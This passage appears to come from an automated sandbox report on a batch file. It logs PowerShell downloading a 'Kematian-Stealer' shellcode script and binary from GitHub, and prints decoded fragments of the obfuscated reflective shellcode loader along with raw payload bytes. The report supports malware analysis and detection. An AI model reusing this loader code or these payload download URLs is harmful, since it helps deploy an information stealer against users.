                                      Data Ascii: bly]::loadwithpartialname("System.Windows.Forms") | Out-Null [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null $picCapture = New-Object System.Windows.Forms.PictureBox try { $devices = [WebCamLi


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.749722140.82.121.34431888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:50 UTC133OUTGET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                      Host: github.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:50 UTC584INHTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Access-Control-Allow-Origin:
                                      Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                      2024-07-03 16:08:50 UTC3025INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.749723185.199.109.1334431888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:51 UTC144OUTGET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                      Host: raw.githubusercontent.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:51 UTC898INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 2974
                                      Cache-Control: max-age=300
                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      Content-Type: text/plain; charset=utf-8
                                      ETag: "fe3aacdc6907ec951179c5b0e10c992291900e024a0164ca4a7fbbedb7ebcc17"
                                      Strict-Transport-Security: max-age=31536000
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: deny
                                      X-XSS-Protection: 1; mode=block
                                      X-GitHub-Request-Id: 4FF3:188D73:73D0D:7B988:6685778D
                                      Accept-Ranges: bytes
                                      Date: Wed, 03 Jul 2024 16:08:51 GMT
                                      Via: 1.1 varnish
                                      X-Served-By: cache-nyc-kteb1890054-NYC
                                      X-Cache: MISS
                                      X-Cache-Hits: 0
                                      X-Timer: S1720022931.398343,VS0,VE89
                                      Vary: Authorization,Accept-Encoding,Origin
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      X-Fastly-Request-ID: 9f5501537cceb63378e520ba5d1b74d5ca9fe05b
                                      Expires: Wed, 03 Jul 2024 16:13:51 GMT
                                      Source-Age: 0
                                      2024-07-03 16:08:51 UTC1378INData Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 27 53 69 6c 65 6e 74 6c 79 43 6f 6e 74 69 6e 75 65 27 0d 0a 66 75 6e 63 74 69 6f 6e 20 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6b 65 6d 61 74 69 61 6e 5f 6d 6f 64 75 6c 65 73 2c 20 24 6b 65 6d 61 74 69 61 6e 5f 66 75 6e 63 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 72 52 45 4e 74 64 4f 4d 41 69 6e 22 2e 28 27 47 27 20 2b 20 27 65 27 20 2b 20 27 74 41 27 20 2b 20 27 73 73 65 6d 62 6c 69 65 73 27 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 4c 6f 42 41 4c 41 73 53 65 4d 42 6c 59 63 41 63 68 65 22 20 2d 41 6e 64 20 24 5f 2e 22 6c 4f 43 61 54 69 6f 4e 22 2e 28 27 53 70
                                      Data Ascii: $ProgressPreference = 'SilentlyContinue'function KematianLoader { Param ($kematian_modules, $kematian_func) $assem = ([AppDomain]::"cUrRENtdOMAin".('G' + 'e' + 'tA' + 'ssemblies').Invoke() | ? { $_."GLoBALAsSeMBlYcAche" -And $_."lOCaTioN".('Sp
                                      2024-07-03 16:08:51 UTC1378INData Raw: 64 65 42 79 53 69 67 2c 20 50 75 62 6c 69 63 27 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 22 73 74 61 6e 64 41 52 44 22 2c 20 24 66 75 6e 63 29 2e 28 27 53 65 74 49 6d 70 6c 65 27 20 2b 20 27 6d 65 6e 74 27 20 2b 20 27 61 74 69 6f 27 20 2b 20 27 6e 27 20 2b 20 27 46 6c 61 67 27 20 2b 20 27 73 27 29 2e 49 6e 76 6f 6b 65 28 27 52 75 6e 74 69 6d 65 2c 20 4d 61 6e 61 67 65 64 27 29 0d 0a 20 20 20 20 24 74 79 70 65 2e 28 27 44 65 66 69 27 20 2b 20 27 6e 27 20 2b 20 27 65 4d 65 74 68 6f 64 27 29 2e 49 6e 76 6f 6b 65 28 27 49 6e 76 6f 6b 65 27 2c 20 27 50 75 62 6c 69 63 2c 20 48 69 64 65 42 79 53 69 67 2c 20 4e 65 77 53 6c 6f 74 2c 20 56 69 72 74 75 61 6c 27 2c 20 24 64 65 6c 54
                                      Data Ascii: deBySig, Public', [System.Reflection.CallingConventions]::"standARD", $func).('SetImple' + 'ment' + 'atio' + 'n' + 'Flag' + 's').Invoke('Runtime, Managed') $type.('Defi' + 'n' + 'eMethod').Invoke('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delT
                                      2024-07-03 16:08:51 UTC218INData Raw: 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 47 27 20 2b 20 27 65 74 44 27 20 2b 20 27 65 6c 65 27 20 2b 20 27 67 61 74 65 46 27 20 2b 20 27 6f 72 46 75 6e 63 74 69 6f 6e 50 27 20 2b 20 27 6f 69 6e 74 65 72 27 29 2e 49 6e 76 6f 6b 65 28 28 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 29 2c 20 28 6b 65 6d 61 74 69 61 6e 5f 64 65 6c 65 67 61 74 65 73 20 40 28 5b 49 6e 74 50 74 72 5d 2c 20 5b 49 6e 74 33 32 5d 29 28 5b 49 6e 74 5d 29 29 29 2e 22 69 4e 56 4f 6b 45 22 28 24 68 54 68 72 65 61 64 2c 20 30 78 46 46 46 46 46 46 46 46 29 0d 0a
                                      Data Ascii: ervices.Marshal]::('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer').Invoke((KematianLoader kernel32.dll WaitForSingleObject), (kematian_delegates @([IntPtr], [Int32])([Int])))."iNVOkE"($hThread, 0xFFFFFFFF)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.749724140.82.121.34431888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:52 UTC204OUTGET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: github.com
                                      2024-07-03 16:08:52 UTC997INHTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                      2024-07-03 16:08:52 UTC3025INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.749725185.199.110.1334431888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:53 UTC683OUTGET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: objects.githubusercontent.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:53 UTC778INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 3992755
                                      Content-Type: application/octet-stream
                                      Last-Modified: Sun, 30 Jun 2024 05:35:21 GMT
                                      ETag: "0x8DC98C66EE845A6"
                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                      x-ms-request-id: be5d7460-101e-0036-11af-ca6c25000000
                                      x-ms-version: 2020-10-02
                                      x-ms-creation-time: Sun, 30 Jun 2024 05:35:21 GMT
                                      x-ms-lease-status: unlocked
                                      x-ms-lease-state: available
                                      x-ms-blob-type: BlockBlob
                                      Content-Disposition: attachment; filename=kematian.bin
                                      x-ms-server-encrypted: true
                                      Via: 1.1 varnish, 1.1 varnish
                                      Accept-Ranges: bytes
                                      Age: 0
                                      Date: Wed, 03 Jul 2024 16:08:53 GMT
                                      X-Served-By: cache-iad-kcgs7200102-IAD, cache-nyc-kteb1890056-NYC
                                      X-Cache: HIT, MISS
                                      X-Cache-Hits: 1363, 0
                                      X-Timer: S1720022933.184402,VS0,VE42
                                      2024-07-03 16:08:53 UTC1378INData Raw: e8 1d b8 3c 00 1d b8 3c 00 b3 2c 56 3d 24 16 24 68 1b c9 41 79 02 c4 75 c0 09 bc 22 bf c1 da 01 6f 6f 96 a7 ad a1 66 b7 49 00 00 00 00 ae b4 17 85 6f b6 2f 28 4e 11 7b 33 c7 79 42 b5 b9 10 82 42 8d 94 d0 e2 b5 de 1c c5 4a 48 29 de 7b 84 22 a4 29 2b 07 f1 c9 42 54 80 86 d5 e5 af f4 1c b4 3a 57 67 b9 29 c0 05 4f 8d 2a 9f a9 f8 65 67 ab 95 76 e1 ea d3 b2 63 36 7f fa a6 4b f0 7c a2 99 37 26 79 b8 fd 2e fe b3 b5 3f 49 db 42 0b 32 4f f4 bb 36 09 4b ca 51 97 45 d9 b9 3d e2 9d 3a 7d cf 4f 73 72 30 23 02 f4 c9 5a 63 a5 4b 0e f2 64 4c cf 73 64 65 15 ba c0 e9 cf 59 64 59 25 7a b6 1c 5c e6 ea b3 94 4e c9 d3 1f d9 98 9d 89 19 93 42 b2 55 8c b9 2a 03 a6 45 ce fc 34 e3 33 6e e5 3e 28 1b 7f 0d 86 0c ed 10 61 25 5f a6 bf db d3 d9 91 a0 72 9f 51 08 09 16 c1 d9 c0 64 22 cb
                                      Data Ascii: <<,V=$$hAyu"oofIo/(N{3yBBJH){")+BT:Wg)O*egvc6K|7&y.?IB2O6KQE=:}Osr0#ZcKdLsdeYdY%z\NBU*E43n>(a%_rQd"
                                      2024-07-03 16:08:53 UTC1378INData Raw: 93 e2 3f 99 d7 8b 1e b2 17 d4 00 04 a4 7d 41 f7 4b 07 a4 96 1b 3c 67 f1 fd e6 71 41 df 51 db c7 5b e9 65 db 6e 0b 6c 3a b0 83 84 a2 65 69 96 a4 0e 57 5d a0 cc 3e cd 57 8a 7b 8e 8e 7a 9c cd 64 ed e6 ee 56 04 18 33 42 2a b6 fb b9 5c b6 70 37 af 0d 95 ed 9f 29 1d 42 79 16 e3 7e 1d a7 b9 fb 31 88 dd 1b 0a 34 70 1d b3 70 44 6f 41 c3 cd 58 09 ab f6 c7 30 2d dd 25 cc d9 9b d5 24 bb d0 09 da 00 67 53 31 6a 0e af fa 48 ba 22 6f f3 76 e0 05 b0 02 d9 03 7a 8d 2a b3 34 71 72 d9 a5 b5 f6 45 de 8e e6 2c 08 2b 0d d1 12 1f e7 57 9b 52 6f de 64 76 39 3b d6 33 d8 0e f4 5e 4c 46 75 99 de 86 19 3d 50 43 a5 9c fc f6 7c ec 18 85 fd 80 70 d9 38 12 89 7d 72 63 e9 66 25 e1 c0 6a 7a 22 ec 21 b3 11 af 66 fa fd 07 b8 fe 79 ed e1 73 be 59 99 c3 4b 44 49 3d d1 bb bf 41 ae c4 b4 63 83
                                      Data Ascii: ?}AK<gqAQ[enl:eiW]>W{zdV3B*\p7)By~14ppDoAX0-%$gS1jH"ovz*4qrE,+WRodv9;3^LFu=PC|p8}rcf%jz"!fysYKDI=Ac
                                      2024-07-03 16:08:53 UTC1378INData Raw: 0c d1 29 06 cc 17 e7 93 e6 a6 53 8c 47 ee 8c 9b df 93 c1 cb 34 c4 3d 3f 87 f1 5f 88 3f 7b 77 84 1d 56 f5 aa 9f ce a3 20 9d 00 7a f5 3e 4d 2a cd 5f 77 15 a1 83 7c 51 7f 64 b6 08 47 f3 fc e6 d6 45 31 97 fb e9 05 55 cd 12 18 49 e4 54 90 96 7e a2 40 41 63 fa 39 1c 06 fe c5 7b 3e 05 95 8c ee ba 4c 90 7e b5 71 cc 80 c6 e8 92 55 82 91 5d 3f 2e e4 c1 69 14 67 bd 56 84 ed 91 85 2a d1 33 75 6b 93 f4 61 96 8a d5 34 44 83 d6 d1 45 e4 52 51 97 b8 be 50 85 e8 18 20 0d e7 92 2c 05 cc 12 6d 5c 8b fc 4f ae b3 37 f8 3e b6 a3 ad 55 d9 ee 97 7c c8 ac 97 bb f2 43 7a 00 e5 be 01 29 8f e1 16 4c ef 4e 00 65 54 63 6f ff 6c c8 94 64 a8 5c 7c 60 7e e6 ba f3 51 74 4e c7 14 22 a5 b1 28 9c 11 1f 74 c2 99 0b 25 6c 61 1f 81 22 0e 1c 51 f3 5c 1c 80 39 32 aa b3 9e d8 5d 92 a8 6b 68 e2 a3
                                      Data Ascii: )SG4=?_?{wV z>M*_w|QdGE1UIT~@Ac9{>L~qU]?.igV*3uka4DERQP ,m\O7>U|Cz)LNeTcold\|`~QtN"(t%la"Q\92]kh
                                      2024-07-03 16:08:53 UTC1378INData Raw: a7 19 02 88 66 c3 90 0b 2d 36 14 8c c0 35 c4 b1 77 dd 16 7d 4a 8f 0b 20 7b f4 26 a3 64 1d c9 8f 20 43 24 20 fa 76 4f e5 7d c0 8c 2f d8 1e 24 90 ea fd 0f ac 14 58 fb e4 ff 0e 04 6f 62 f9 05 f1 86 82 67 be 7b 73 b9 5f 1d aa 8f 26 af 4b d8 bb 97 fe e0 da f5 fc 52 d9 14 af 98 2b 35 db f3 e8 5e 46 8f 5d ab 0e 3b 22 8a 53 3d 48 22 2b 2c 04 21 c4 95 29 0e 7e c5 e2 21 fe 96 a3 90 29 8c 5e ac 6a 89 0c 75 0d 72 e4 06 94 ac 00 55 1f a0 9f e3 cf b1 3c 8a cc d3 3f 95 2c ed 61 dd 8b ac e5 e0 26 9c 0f 97 05 54 ec 9a c2 0e 3f cc 7e 1b 5e 5c c5 3b 7c 84 0a 0a 45 b6 3a 24 66 a7 da 85 5c b2 15 a0 50 10 8c 4a 9c 60 9e 2a cf f4 70 86 b3 4f a2 0b c8 20 8d 50 73 47 fb cc 62 9b 20 99 2e a9 43 27 22 34 8e cc df dc 7f 74 47 9b 08 67 86 e7 69 22 26 54 c2 1b 2e 87 a4 f2 78 20 3b 4e
                                      Data Ascii: f-65w}J {&d C$ vO}/$Xobg{s_&KR+5^F];"S=H"+,!)~!)^jurU<?,a&T?~^\;|E:$f\PJ`*pO PsGb .C'"4tGgi"&T.x ;N
                                      2024-07-03 16:08:53 UTC1378INData Raw: 9e b1 6c 33 53 d9 4a 09 25 7d c9 8a 12 09 43 0c 91 bb 0c d2 b1 59 05 44 0c af ad 38 76 d5 c6 d4 16 76 ad 6d 2b de 59 ff 8f f2 4d cd b5 05 b8 63 e3 51 f3 de eb 74 b2 18 58 ac 29 d4 3b 90 c3 80 34 49 8c 3a d1 8b d5 a7 ea 8e fa 0f 53 e3 d8 a3 bd db cf ec 27 db 2f 2d c0 bd 3d c1 d4 df 78 ee 6b d2 a7 6c e3 0d ac be 63 44 0a 95 72 c0 13 75 62 36 11 77 1c d7 f9 a9 35 15 d2 30 87 23 38 ff ab 35 3b 9f 3f 4d 06 78 bf fd e1 13 f6 55 38 13 32 d9 b1 56 a9 ca 0d d2 fd 30 fb 22 09 6f 68 ff a0 c0 f0 dd 9f 43 75 32 eb 27 e3 be fb 0c be 81 0f 85 f8 03 52 d5 cb 0e da 7b 55 f3 14 66 5a 1f 38 69 ed 2d c6 eb c0 81 de 38 a8 63 e9 50 4c 78 aa 73 33 59 be eb 1f 5e 30 bd a9 48 e1 00 52 ef 63 ae e3 c9 cf 42 a0 6d c2 92 92 22 8c 8f 95 04 1d 7c 8a 4d 89 bf 55 c9 43 8b 6c 59 42 2d 4d
                                      Data Ascii: l3SJ%}CYD8vvm+YMcQtX);4I:S'/-=xklcDrub6w50#85;?MxU82V0"ohCu2'R{UfZ8i-8cPLxs3Y^0HRcBm"|MUClYB-M
                                      2024-07-03 16:08:53 UTC1378INData Raw: eb 9f 8e 7c f7 ff 3a ef 3d 12 11 b8 67 8a 61 22 7b 95 80 f8 77 ba 89 8a 0a 68 b6 73 9c 09 95 b5 97 9f 7e a8 5b 2b 5d a1 df 71 04 58 9c e6 21 44 c2 91 2c 0f a5 19 e2 9a 83 9c 8a b0 0d 42 69 1b 63 82 d7 1c 84 30 59 db 91 f1 88 44 34 8e a8 67 9d 27 df 79 9a a6 6a 07 02 cf f8 32 f3 16 33 4d 94 e2 f7 cb 93 89 f7 7a 49 54 2a a5 7b d7 6d 64 49 59 f1 94 60 5e 7b 14 d1 26 97 5f e7 4b 29 55 e0 ec cc 78 47 c1 68 70 24 8d 7d 15 1e cc 41 57 a5 4e 74 57 a5 77 78 b4 1f 6e d3 a7 de 29 4f 66 f5 73 cb 26 6b 04 ab e7 f1 09 0e a8 a3 1b 95 47 09 e1 10 e0 20 9a dc 5f 2f 6f 4d 41 cf 20 bb a8 9a b6 15 0d 15 1c ee 62 09 aa 73 c4 04 a7 7b 68 39 ec 59 be 1a 2f 87 c0 94 83 92 df 2d bb d2 a8 bd b9 3e f3 4a e2 5b 28 fc 63 f0 05 02 2f 3d 67 03 85 60 c8 26 63 4f 81 b4 d9 1d c7 80 48 7a
                                      Data Ascii: |:=ga"{whs~[+]qX!D,Bic0YD4g'yj23MzIT*{mdIY`^{&_K)UxGhp$}AWNtWwxn)Ofs&kG _/oMA bs{h9Y/->J[(c/=g`&cOHz
                                      2024-07-03 16:08:53 UTC1378INData Raw: ce c2 2d 93 cd fd b2 d5 06 63 66 c0 8b 51 fe 93 3f eb fb f1 1d a0 54 4b d9 ea 93 3a a1 69 7f 07 bf cf ce 84 bb 3c 50 15 3a 1e 0e f0 20 f3 ef f2 7a c7 79 17 44 ff 96 2b b7 97 22 a2 2e bc 64 4f a5 14 8b 0d 13 30 b0 aa 71 c8 fa 73 36 bf 10 11 04 21 82 8e 76 14 c1 d0 89 e5 76 12 83 b7 65 be 6a ec 77 2a e0 18 24 c4 ee 8a 79 e7 ff 9f 28 61 60 22 3d 58 9d a4 38 31 95 a9 7c e9 dc 18 24 db 7f 1a a5 76 df 93 54 50 ff 11 f1 cc 02 10 d0 a2 32 fd 55 5c 27 4f 63 22 62 8e 60 6c 82 30 54 97 62 d2 f2 b1 4b 61 d0 61 88 53 74 5a 96 4e a4 21 cf f6 6d 6f 69 94 41 44 a4 61 7d 81 11 ee 42 d8 ae fa 43 4b d8 63 9f ba a1 a3 57 d7 f7 1f d9 fe 7a 07 0a c0 e2 52 97 c6 38 20 05 68 ee 57 e5 13 20 58 2d 29 f8 b9 28 c0 90 2b ce e4 19 44 04 6c 83 9d 85 4d 17 3d 0f 7a 61 83 80 26 eb c5 b7
                                      Data Ascii: -cfQ?TK:i<P: zyD+".dO0qs6!vvejw*$y(a`"=X81|$vTP2U\'Oc"b`l0TbKaaStZN!moiADa}BCKcWzR8 hW X-)(+DlM=za&
                                      2024-07-03 16:08:53 UTC1378INData Raw: ff f6 57 35 b7 e0 9d c6 d7 b0 96 79 5b 33 86 f1 d6 f5 81 32 b6 44 19 fb 87 d5 21 6f 72 af 4c a7 ae fa e0 23 0e 3b 1d 9c 84 e2 01 f4 f4 21 74 84 87 d6 53 be d1 2f cb 4e 3a da a9 ac 3a e1 5c 2f 97 e8 09 91 b7 3d d4 9f d7 ab ba 35 1d 3f 1e e9 82 dc 99 87 f4 92 73 4f aa ea e5 d2 66 66 e0 05 98 bd 5c 84 81 7e d5 12 1d 7e 40 3a 21 e1 96 df 82 f4 2e e4 fd 81 32 79 ea d5 c4 dd 57 d8 13 a6 56 d5 b2 84 ce f6 56 0a 5c 6f e5 de e3 c9 86 a9 c7 52 78 b6 68 bf db 74 de 38 14 49 78 09 5d f6 af 3e 81 71 be 1c a7 65 61 1c 8b 4d b6 de 6d bd d9 d3 bf 11 3d 79 dc 7a a4 8e cb 30 9b 51 24 0b 68 54 75 31 34 52 d9 2b 71 e4 2a b7 0b 91 2f 51 79 9e 58 8f 75 d0 66 43 b7 d6 59 9f 5f ab c3 f3 90 f9 f0 a4 c1 e5 72 c6 28 8c 0c b4 14 54 05 ac 24 81 5d a1 c8 fc a1 f7 78 97 41 2d 91 3a a8
                                      Data Ascii: W5y[32D!orL#;!tS/N::\/=5?sOff\~~@:!.2yWVV\oRxht8Ix]>qeaMm=yz0Q$hTu14R+q*/QyXufCY_r(T$]xA-:
                                      2024-07-03 16:08:53 UTC1378INData Raw: 45 4a e4 07 1f 6b cc 49 5f 39 97 9e 6c 2a 7f be 98 2b 68 66 9e 2a 47 3e 72 67 6c 22 bc c1 08 96 fa 30 f3 0f 17 b0 20 c7 26 cf 80 b5 34 2a 91 ca b6 a6 16 4d 60 51 78 e7 b9 ec 2e 6f 75 19 d7 18 75 5a 29 ea 93 43 fc c4 34 0e 01 ee a5 0d 12 cd f6 73 9b 56 2e 97 34 7a 45 80 99 33 67 9e 40 1f e5 97 7b 58 c4 f7 4d 09 62 a8 04 65 aa a3 9a ad 54 2b e2 bc 8e bc 9e 9f 6c 7b a0 5d 68 b1 13 17 ba fb c2 f9 d0 57 ae 17 5c 62 0b 2b 95 4a 17 1c 8a 59 2e e6 b3 76 a8 45 93 fe 75 bd 78 3d ba 00 f6 25 76 b0 66 8a 21 f2 74 54 a9 7b 7a ae 43 ab ee 76 86 3f 9e 88 2e 01 4e 3a 30 63 08 b2 36 1a 44 dc bc 1d f9 aa 2f cb c7 cb 59 f0 38 bf d2 30 d1 59 bb f0 d8 cb 3b 2b 76 e7 10 8e fa fe 6b 00 4e 5e f4 35 f1 78 e0 38 03 c5 a3 03 f0 2f a1 cd 88 34 89 a2 a3 0e 72 44 58 84 30 1a 78 a2 29
                                      Data Ascii: EJkI_9l*+hf*G>rgl"0 &4*M`Qx.ouuZ)C4sV.4zE3g@{XMbeT+l{]hW\b+JY.vEux=%vf!tT{zCv?.N:0c6D/Y80Y;+vkN^5x8/4rDX0x)
                                      2024-07-03 16:08:53 UTC1378INData Raw: 25 06 2e 65 c1 09 02 f5 7e ea c3 d2 e6 e0 7b ae 30 73 a1 53 aa 94 4b 42 a4 46 57 8e 15 4f 39 e5 2c c3 25 14 05 81 12 14 d1 dc ac 08 b7 ab 11 43 4b eb 97 4a 28 31 53 9f 9c 51 73 f4 d8 69 37 4e ee 2a d8 e5 6b 00 7f 09 fc 13 32 46 56 fb d3 99 95 da 81 19 93 df 20 11 f8 1f 7b 52 8a 5f 28 4d 99 d0 9d 94 16 3f 30 34 0f e0 76 39 16 e5 2d cc f7 ae 9d 90 07 62 1b b4 15 bb 98 4e b9 9c 03 6c 2f a0 b9 a8 f5 d7 89 a2 8e c7 08 9c 4c 29 ac a8 16 df da 1d 88 f4 5b 28 0e 83 a1 c3 de d7 44 9c 7f dc 6e c0 bb be 6f 4c bd b0 9b ec 01 61 2f ec 0f f1 12 ad 78 27 cc 89 32 12 fe ba 02 fa 91 6c 8d 68 f5 c9 52 fd 03 b0 77 32 b0 b4 91 75 69 f1 45 c6 c9 9e 84 b2 0a 6e 4a da 5c dd 84 8a 79 5d 91 09 d5 1b fc fc 30 c7 c6 d7 10 08 38 42 87 73 dd 75 c9 df 5f 06 63 d7 e7 3d e5 8b 4f 1b 6f
                                      Data Ascii: %.e~{0sSKBFWO9,%CKJ(1SQsi7N*k2FV {R_(M?04v9-bNl/L)[(DnoLa/x'2lhRw2uiEnJ\y]08Bsu_c=Oo


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:6
                                      Start time:12:08:06
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
                                      Imagebase:0x7ff680b50000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:12:08:06
